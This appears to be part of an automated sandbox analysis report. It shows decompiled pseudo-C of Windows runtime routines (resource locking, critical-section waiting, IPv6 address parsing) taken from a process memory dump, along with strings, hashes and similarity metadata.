
Strings

%%%u, xrefs: 00E41564
]:%u, xrefs: 00E6EA47

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 01c2f8b6cccaba56a740872dd8c12d86a791316a8b446f9537610477de5795c4
Instruction ID: 028dcc80e6ed4f680da609557dd68b0e3af02fc03a48d1e827bf066246998756
Opcode Fuzzy Hash: 01c2f8b6cccaba56a740872dd8c12d86a791316a8b446f9537610477de5795c4
Instruction Fuzzy Hash: C221E3729002199BCF20DE54EC45AEA73ACBB50304F445096FC46F3281EB74AA988BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00E253A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00E253A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00ee01c0;
									_push(_t92);
									_push(0);
									_t37 = E00DFF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00E44FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00E53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00E53F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00E8217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00E53F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00E43915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00E25384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00DFF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00E43915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00DFF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00E43915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00DFF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00E43915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00E25329(_t74, _t92);
													_push(1);
													_t48 = E00E253A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x00e253ab
0x00e253ae
0x00e253b1
0x00e253b4
0x00e253b7
0x00e405b6
0x00e405c0
0x00e405c3
0x00000000
0x00e405c9
0x00e405c9
0x00e405cc
0x00e405d5
0x00e405d5
0x00e253bd
0x00e253bd
0x00e253bd
0x00e253be
0x00e253be
0x00e253be
0x00e253c0
0x00000000
0x00000000
0x00e62269
0x00e6226d
0x00e62349
0x00e6234d
0x00e62273
0x00e62276
0x00e62279
0x00e6227e
0x00e62283
0x00e62287
0x00e6228a
0x00e6228d
0x00e6228f
0x00e622bc
0x00e622bc
0x00e622bc
0x00e622be
0x00e622c4
0x00e622cc
0x00e622d0
0x00e622d6
0x00e622d7
0x00e622da
0x00e622df
0x00e622e4
0x00000000
0x00000000
0x00e622e6
0x00e622e9
0x00e622f4
0x00e622f9
0x00e622fa
0x00e62305
0x00e62314
0x00e62319
0x00e6231a
0x00e6231d
0x00e62320
0x00e62323
0x00e62323
0x00e62328
0x00e6232d
0x00e6232f
0x00e62331
0x00e62336
0x00e62336
0x00e6233b
0x00e6233d
0x00e62350
0x00e62351
0x00e62356
0x00e62359
0x00e62359
0x00e6235b
0x00e6235d
0x00e25367
0x00e2536b
0x00e25372
0x00000000
0x00000000
0x00000000
0x00000000
0x00e62363
0x00e62363
0x00e62369
0x00e6236a
0x00e6236c
0x00e62371
0x00e62373
0x00000000
0x00e62379
0x00e62379
0x00e6237a
0x00e6237f
0x00e6237f
0x00e62385
0x00e62386
0x00e62389
0x00e6238e
0x00e62390
0x00e25378
0x00e2537c
0x00e62396
0x00e62396
0x00e62397
0x00e6239c
0x00e623a2
0x00e623a3
0x00e623a6
0x00e623ab
0x00e623ad
0x00000000
0x00e623b3
0x00e623b3
0x00e623b4
0x00e623b9
0x00e623ba
0x00e623ba
0x00e623bc
0x00e623bf
0x00000000
0x00000000
0x00e59153
0x00e59158
0x00e5915a
0x00e5915e
0x00e59160
0x00000000
0x00e59166
0x00e59166
0x00e59171
0x00e59176
0x00e59176
0x00000000
0x00e59160
0x00e623c6
0x00e623cb
0x00e623ce
0x00e623d7
0x00e623d7
0x00e623ad
0x00e62390
0x00e62373
0x00e6233f
0x00e6233f
0x00000000
0x00e6233f
0x00e62291
0x00e62291
0x00e62293
0x00e62295
0x00e6229a
0x00e622a1
0x00e622a3
0x00e622a7
0x00e622a9
0x00000000
0x00000000
0x00e622ab
0x00e622ad
0x00e622af
0x00000000
0x00000000
0x00000000
0x00e622af
0x00e622b1
0x00e622b4
0x00e622b4
0x00e622b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00e622b6
0x00e6228f
0x00000000
0x00e6226d
0x00e253cb
0x00e253ce
0x00e253d0
0x00e253d4
0x00e253d6
0x00000000
0x00e253d8
0x00e253e3
0x00e253ea
0x00e253ea
0x00e253d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E622F4

Strings

RTL: Resource at %p, xrefs: 00E6230B
RTL: Re-Waiting, xrefs: 00E62328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00E622FC

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: a00d0e9ecc3c1d634cf85355ee37341284fd7dcadf22b50ba3f4b6bcfea32b1e
Instruction ID: 859734cb10f5091bf5a8d7f8fd2bbb59f917a6383e296a6bbe8e24fd4cd3c7d8
Opcode Fuzzy Hash: a00d0e9ecc3c1d634cf85355ee37341284fd7dcadf22b50ba3f4b6bcfea32b1e
Instruction Fuzzy Hash: 6C512772640B166BDB10DB34EC81FA673D8EF543A4F106629FE04EB285E671EC418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E2EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00E2EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00E1DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xee793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00E016C0(_t39);
				} else {
					_t40 = E00DFF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00E43915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00E001A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xee793c; // 0x0
								_push(_t85);
								_t44 = E00E01F28(_t71);
							} else {
								_t44 = E00DFF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00E43915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00E82306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00E2EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00E44FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00E53F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00E53F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xee20c0;
								if(_t85 != 0xee20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00E8217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00E53F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x00e2ec56
0x00e2ec56
0x00e2ec56
0x00e2ec5c
0x00e2ec64
0x00e623e6
0x00e623eb
0x00e623eb
0x00e2ec6a
0x00e2ec6c
0x00e2ec6f
0x00e623f3
0x00e623f8
0x00e623fa
0x00e623fc
0x00e2ec75
0x00e2ec76
0x00e2ec76
0x00e2ec7b
0x00e2ec7c
0x00e2ec7e
0x00e62406
0x00e62407
0x00e6240c
0x00e6240d
0x00e6240d
0x00e6240d
0x00e62414
0x00e62417
0x00e6241e
0x00e62435
0x00e62438
0x00e6243c
0x00e6243f
0x00e62442
0x00e62443
0x00e62446
0x00e62449
0x00e62453
0x00e62455
0x00e6245b
0x00e6245b
0x00e2eb99
0x00e2eb99
0x00e2eb9c
0x00e2eb9d
0x00e2eb9f
0x00e2eba2
0x00e62465
0x00e6246b
0x00e6246d
0x00e2eba8
0x00e2eba9
0x00e2eba9
0x00e2ebae
0x00e2ebb3
0x00e2ebb9
0x00e2ebbb
0x00e62513
0x00e62514
0x00e62519
0x00e6251b
0x00e2ec2a
0x00e2ec2d
0x00e2ec33
0x00e2ec36
0x00e2ec3a
0x00e2ec3e
0x00e2ec40
0x00e2ec47
0x00e2ec47
0x00e2ec40
0x00e022c6
0x00e2ebc1
0x00e2ebc1
0x00e2ebc5
0x00e2ec9a
0x00e2ec9a
0x00e2ebd6
0x00e2ebd6
0x00000000
0x00e2ebbb
0x00e62477
0x00e6247c
0x00e62486
0x00e6248b
0x00e62496
0x00e6249b
0x00e6249d
0x00e624a0
0x00e624a3
0x00e624aa
0x00e624aa
0x00e624a5
0x00e624a5
0x00e624a5
0x00e624ac
0x00e624af
0x00e624b0
0x00e624b3
0x00e624b9
0x00e624ba
0x00e624bb
0x00e624c6
0x00e624cb
0x00e624cd
0x00e624d0
0x00e624d1
0x00e624d4
0x00e624d6
0x00e624d9
0x00e624d9
0x00e624dc
0x00e624df
0x00e624e1
0x00e624e7
0x00e624e9
0x00e624ec
0x00e624ef
0x00e624f2
0x00e624f2
0x00e624ef
0x00e624e7
0x00e624fa
0x00e624ff
0x00e62501
0x00e62503
0x00e62506
0x00e6250b
0x00e2eb8c
0x00e2eb93
0x00000000
0x00000000
0x00e2eb93
0x00000000
0x00e2eb99
0x00e2ec85
0x00e2ec85
0x00e2ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 00E624FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00E624BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00E6248D

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 5364fe9bd59044e30e17c606b2f1a546256d71b90664f881d94329d51a1f7f82
Instruction ID: e6bd5cca4951a3a98283a46c3c1e0743161ad483737dca33d82b9b203245d1f6
Opcode Fuzzy Hash: 5364fe9bd59044e30e17c606b2f1a546256d71b90664f881d94329d51a1f7f82
Instruction Fuzzy Hash: 61410A70640614AFCB20DB68EC86FAA77E9EF84350F209619F665BB3C1D734E9418B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E3FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E3FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00E3EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00E3EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00E3685D(_t167, 4) == 0) {
								if(E00E3685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00E3685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00E3685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00E18980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00E0DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00E3EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00E3EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x00e3fcd1
0x00e3fcd6
0x00e3fcd9
0x00e3fcdc
0x00e3fcdf
0x00e3fce2
0x00e3fce5
0x00e3fce8
0x00e3fceb
0x00e3fced
0x00e3fced
0x00e3fcf3
0x00000000
0x00000000
0x00e3fcfc
0x00e3fcfe
0x00e3fdc1
0x00e6ecbd
0x00000000
0x00e6eccc
0x00e6eccc
0x00e6ecd2
0x00000000
0x00000000
0x00e6ecdf
0x00e6ece0
0x00e6ece4
0x00e6eceb
0x00e6ecee
0x00e6eca8
0x00e6eca8
0x00e6ecaa
0x00e3fd76
0x00e3fd79
0x00e3fdb4
0x00e3fdb5
0x00e3fdb6
0x00000000
0x00e3fdb6
0x00e3fd7e
0x00e6ecfc
0x00e3fe2f
0x00000000
0x00e3fe2f
0x00e6ed08
0x00e6ed0f
0x00e6ed17
0x00e6ed1b
0x00000000
0x00e6ed1b
0x00e3fd88
0x00000000
0x00000000
0x00e3fd94
0x00e3fd99
0x00e3fda1
0x00000000
0x00000000
0x00e3fdb0
0x00000000
0x00e3fdb0
0x00e6ecbd
0x00e3fdc7
0x00e3fdcb
0x00000000
0x00e3fdd7
0x00e3fde3
0x00e3fe06
0x00e51fe7
0x00000000
0x00000000
0x00e51fef
0x00e51ff0
0x00e51ff4
0x00e51ff7
0x00e51ffa
0x00e51ffd
0x00e52000
0x00000000
0x00000000
0x00e6ecf1
0x00000000
0x00e6ecf1
0x00000000
0x00e3fe06
0x00e3fde8
0x00e3fdec
0x00e3fdef
0x00e3fdf2
0x00000000
0x00e3fdf2
0x00e3fdcb
0x00e3fd04
0x00e3fd05
0x00e6ec67
0x00000000
0x00000000
0x00e6ec6f
0x00000000
0x00e6ec6f
0x00e3fd13
0x00e3fd3c
0x00e3fd40
0x00e6ec75
0x00e6ec7a
0x00000000
0x00e6ec8a
0x00e6ec8a
0x00e6ec90
0x00e6ecb2
0x00e3fd73
0x00e3fd73
0x00000000
0x00e3fd73
0x00e6ec95
0x00000000
0x00000000
0x00e6eca1
0x00e6eca4
0x00e6eca5
0x00000000
0x00e6eca5
0x00e6ec7a
0x00e3fd4a
0x00000000
0x00e3fd6e
0x00e3fd6e
0x00e3fd71
0x00000000
0x00e3fd71
0x00e3fd4a
0x00e3fd21
0x00e4a3a1
0x00000000
0x00e4a3a1
0x00e3fd36
0x00e5200b
0x00e52012
0x00000000
0x00000000
0x00e52018
0x00000000
0x00e52018
0x00000000
0x00e3fd36
0x00e3fe0f
0x00e3fe16
0x00e4a3ad
0x00000000
0x00000000
0x00e4a3b3
0x00e4a3b3
0x00e3fe1f
0x00e6ed25
0x00e6ed86
0x00000000
0x00000000
0x00e6ed91
0x00e6ed95
0x00e6ed95
0x00e6ed9a
0x00e6edad
0x00e6edb3
0x00e6edba
0x00e6edc4
0x00e6edc9
0x00000000
0x00e6edcc
0x00e6ed2a
0x00e6ed55
0x00000000
0x00000000
0x00e6ed61
0x00e6ed66
0x00e6ed6e
0x00000000
0x00000000
0x00e6ed7d
0x00000000
0x00e6ed7d
0x00e6ed30
0x00000000
0x00000000
0x00e6ed3c
0x00e6ed43
0x00e6ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 00E3FD94

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: ef354afe61111c1b386b2ed636e475449e5e42e1f009a89ef026db7bca8784c2
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 7A919035D0025AEBDF24DF6AC8497EEBBB4EF55319F20A07AD401B6292E7304A45CB91

Uniqueness

Uniqueness Score: -1.00%

